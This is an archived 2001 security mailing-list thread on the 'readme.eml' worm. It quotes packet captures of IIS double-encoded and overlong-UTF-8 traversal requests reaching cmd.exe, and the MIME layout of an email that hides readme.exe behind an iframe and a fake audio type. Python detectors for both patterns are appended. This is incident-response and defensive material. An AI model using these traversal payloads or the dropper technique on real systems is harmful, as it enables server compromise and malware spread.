Kirk, what version of Windows are you running? Have you got an active IIS
server? It probably came in that way, unless there are other propagation
means we didn't isolate yet. Please tell us what kind of connectivity
you've got (shared drives, FTP, IIS running, etc)...

Thanks,
Pedro.

At 10:13 -0600 18.09.01, Kirk Ellsworth wrote:
>I have received this as well. It looks like there are over 1000
>sample.eml and desktop.eml on my pc? Attached in the 77kb email is a
>txt file and a readme.exe.
>I have not downloaded anything or opened any weird attachments and I
>received it this morning at about 7:30 mnt. It spread everywhere on my
>pc at 8:05.
>
>I am only able to delete about 40% of the .eml's. If anyone has a good
>idea on this one please pass it on.
>
>-----Original Message-----
>From: Pedro Miller Rabinovitch [mailto:pedroat_private]
>Sent: Tuesday, September 18, 2001 9:14 AM
>To: forensicsat_private
>Cc: Cory McIntire; focus-msat_private;
>focus-idsat_private
>Subject: New worm? 'readme.eml'
>
>
>Hi,
>
> is this CodeBlue? Some new worm? Or just one I hadn't heard about?
>It uses double-encoding exploits, and propagates both by adding
>javascript to the main page and by probing other systems...
>
>Report:
>
>Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS:
>
>Date     Time   D  Source IP        Sport  Dport  P
>01Sep18  11:20  T  200.192.226.40   3933   80     T
>01Sep18  11:20  T  200.192.226.40   3767   80     T
>01Sep18  11:20  T  200.192.226.40   3572   80     T
>
> SOURCE: 200.192.226.40
>
> 45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx  E...ba@.w..=...(xxxx
> 0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00  ...P{....~.NP."8.z..
> 47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35  GET /_vti_bin/..%255
> 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35  c../..%255c../..%255
> 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63  c../winnt/system32/c
> 6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31  md.exe?/c+dir HTTP/1
> 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e  .0..Host: www..Connn
> 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a           ection: close....
>
> 45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx  E....c@.w..:...(xxxx
> 0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00  ...P{....O..P."8....
> 47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35  GET /_mem_bin/..%255
> 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35  c../..%255c../..%255
> 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63  c../winnt/system32/c
> 6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31  md.exe?/c+dir HTTP/1
> 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e  .0..Host: www..Connn
> 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a           ection: close....
>
> 45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx  E...9e@.w.?....(xxxx
> 0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00  .].P{."6.LZ.P."8.6..
> 47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e  GET /msadc/..%255c..
> 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e  /..%255c../..%255c/.
> 2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e  .%c1%1c../..%c1%1c..
> 2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79  /..%c1%1c../winnt/sy
> 73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69  stem32/cmd.exe?/c+di
> 72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77  r HTTP/1.0..Host: ww
> 77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73  w..Connnection: clos
> 65 0d 0a 0d 0a                                                e....
>
>---------------
>
>When I connected to the originating server (femm.tdkomm.com.br), I
>saw the normal web page for the institution, plus a pop-up window for
>http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as
>follows:
>
>
>MIME-Version: 1.0
>Content-Type: multipart/related;
>        type="multipart/alternative"; boundary="====_ABC1234567890DEF_===="
>X-Priority: 3
>X-MSMail-Priority: Normal
>X-Unsent: 1
>
>--====_ABC1234567890DEF_====
>Content-Type: multipart/alternative;
>        boundary="====_ABC0987654321DEF_===="
>
>--====_ABC0987654321DEF_====
>Content-Type: text/html;
>        charset="iso-8859-1"
>Content-Transfer-Encoding: quoted-printable
>
>
><HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
><iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
></iframe></BODY></HTML>
>--====_ABC0987654321DEF_====--
>
>--====_ABC1234567890DEF_====
>Content-Type: audio/x-wav;
>        name="readme.exe"
>Content-Transfer-Encoding: base64
>Content-ID: <EA4DMGBP9p>
>
>... (worm code follows)
>
>I've inspected the executable code, and it reads like a worm. (doh)
>
>Has anyone seen this?
>
>Regards,
>
> Pedro.
>--
>Pedro Miller Rabinovitch
>Technology Manager
>Cipher Technology
>55-21-2579-3999
>http://www.cipher.com.br

--
Pedro Miller Rabinovitch
General Technology Manager
Cipher Technology
21-2579-3999
www.cipher.com.br
_____
"IT Security - a Cipher Technology specialty"

-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 11:23:54 PDT
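A detector for the probes in the capture quoted above, added here as an illustration and not part of the post or of any product: it decodes the request URI the way a lenient server would, so both `..%255c..` (double URL encoding) and `..%c1%1c..` (overlong UTF-8) resolve to `../` before the traversal check runs. The log lines are constructed, and the `OVERLONG` table is an assumed, illustrative mapping that also covers sibling byte pairs not shown in the capture.

```python
"""Flag the IIS traversal probes seen in the capture above: '..%255c..'
(double URL encoding: %25 -> '%', then %5c -> '\\') and '..%c1%1c..'
(an overlong UTF-8 form of '\\').  Log lines below are constructed."""
import re
from urllib.parse import unquote

# Overlong UTF-8 byte pairs that a lenient decoder maps onto '\\' or '/'.
# Illustrative table built around the pair visible on the page, not exhaustive.
OVERLONG = {"%c1%1c": "\\", "%c1%9c": "\\", "%c0%af": "/", "%c0%2f": "/"}

def decode_iis_path(raw, rounds=3):
    """Decode like a lenient server: repeated %-decoding until the string
    stops changing, overlong UTF-8 mapped to ASCII, '\\' unified to '/'."""
    path = raw.lower()
    for _ in range(rounds):
        for seq, ch in OVERLONG.items():
            path = path.replace(seq, ch)
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def decoded_request_path(request_line):
    """URI path of an HTTP request line, query dropped and fully decoded."""
    m = re.match(r"(?:GET|POST|HEAD)\s+(\S+)", request_line)
    return decode_iis_path(m.group(1).split("?", 1)[0]) if m else None

def is_traversal_probe(request_line):
    """True when the decoded path climbs out of the web root to cmd.exe."""
    path = decoded_request_path(request_line)
    return bool(path) and "/../" in path and "/winnt/system32/cmd.exe" in path

def scan(lines):
    """(client IP, decoded path) for every common-log-style line that probes."""
    hits = []
    for line in lines:
        client, _, request = line.partition(' "')
        if is_traversal_probe(request):
            hits.append((client.split()[0], decoded_request_path(request)))
    return hits

# Constructed sample: two of the request URIs from the capture plus a benign one.
SAMPLE = [
    '200.192.226.40 - - [18/Sep/2001:11:20:00 -0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0',
    '200.192.226.40 - - [18/Sep/2001:11:20:01 -0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0',
    '10.0.0.5 - - [18/Sep/2001:11:21:00 -0300] "GET /index.html HTTP/1.0" 200 1234',
]
```

The same normalisation is what a server-side filter must do before any path check; matching on the raw `%255c` string alone misses the `%c1%1c` variant in the third packet.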
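Added example, not part of the post: a check with Python's standard `email` module for the readme.eml layout quoted above, in which a hidden iframe pulls in a `cid:` part that is declared `audio/x-wav`, named `readme.exe` and begins with the PE `MZ` signature. The message in `SAMPLE` is constructed to mirror that layout with a harmless placeholder payload.

```python
"""Find cid-linked attachments whose declared MIME type hides an executable,
the pattern of the quoted readme.eml.  SAMPLE is constructed; its base64
body is an MZ-prefixed placeholder, not worm code."""
import base64
import email
import re
from email import policy

IFRAME_CID = re.compile(r'<iframe[^>]*src=["\']?cid:([^"\'\s>]+)', re.I)

def cid_references(msg):
    """Content-IDs targeted by <iframe src=cid:...> in any HTML part."""
    cids = set()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            cids.update(IFRAME_CID.findall(part.get_content()))
    return cids

def find_iframe_droppers(raw_bytes):
    """(cid, declared type, filename, reasons) for each iframe-referenced
    part that looks like an executable behind a harmless MIME type."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    by_cid = {p.get("Content-ID", "").strip("<>"): p for p in msg.walk()}
    findings = []
    for cid in sorted(cid_references(msg)):
        part = by_cid.get(cid)
        if part is None:
            continue
        name = (part.get_filename() or "").lower()
        payload = part.get_payload(decode=True) or b""
        reasons = []
        if name.endswith((".exe", ".scr")):
            reasons.append("executable filename")
        if payload[:2] == b"MZ":
            reasons.append("PE magic under " + part.get_content_type())
        if reasons:
            findings.append((cid, part.get_content_type(), name, reasons))
    return findings

# Constructed message mirroring the quoted layout: related -> alternative ->
# html with hidden iframe, plus an audio/x-wav "readme.exe" part by Content-ID.
SAMPLE = (
    b"MIME-Version: 1.0\nContent-Type: multipart/related; boundary=\"OUTER\"\n\n"
    b"--OUTER\nContent-Type: multipart/alternative; boundary=\"INNER\"\n\n"
    b"--INNER\nContent-Type: text/html; charset=\"iso-8859-1\"\n"
    b"Content-Transfer-Encoding: quoted-printable\n\n"
    b"<HTML><BODY><iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>"
    b"</iframe></BODY></HTML>\n--INNER--\n\n"
    b"--OUTER\nContent-Type: audio/x-wav; name=\"readme.exe\"\n"
    b"Content-Transfer-Encoding: base64\nContent-ID: <EA4DMGBP9p>\n\n"
    + base64.b64encode(b"MZ" + bytes(62) + b"constructed placeholder")
    + b"\n--OUTER--\n"
)
```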